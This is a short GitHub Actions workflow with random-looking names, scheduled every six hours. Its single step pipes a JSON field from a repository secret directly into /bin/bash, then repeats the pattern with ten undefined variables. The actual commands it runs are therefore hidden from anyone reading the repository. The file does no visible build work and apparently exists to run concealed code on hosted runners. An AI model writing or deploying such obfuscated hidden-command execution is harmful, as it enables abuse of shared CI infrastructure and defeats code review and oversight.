name: ghauiijnan

on:
  workflow_dispatch:
  schedule:
    - cron: '48 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ghauiijnan
        env:
          yfhe718: ${{ secrets.yfhe718 }}
        run: |
          echo $yfhe718 | jq -r .jx00 | /bin/bash
          echo $nntm0 | jq -r .xwe7 | /bin/bash
          echo $r11192 | jq -r .zih5375 | /bin/bash
          echo $ikhu62534 | jq -r .un992 | /bin/bash
          echo $hbjp5327 | jq -r .mylo432 | /bin/bash
          echo $icbw71 | jq -r .wvp86700 | /bin/bash
          echo $lsfre44344 | jq -r .w4 | /bin/bash
          echo $cac327 | jq -r .p068 | /bin/bash
          echo $jze478 | jq -r .o1370 | /bin/bash
          echo $gk36451 | jq -r .gzni630 | /bin/bash
          echo $h79689 | jq -r .mm370 | /bin/bash

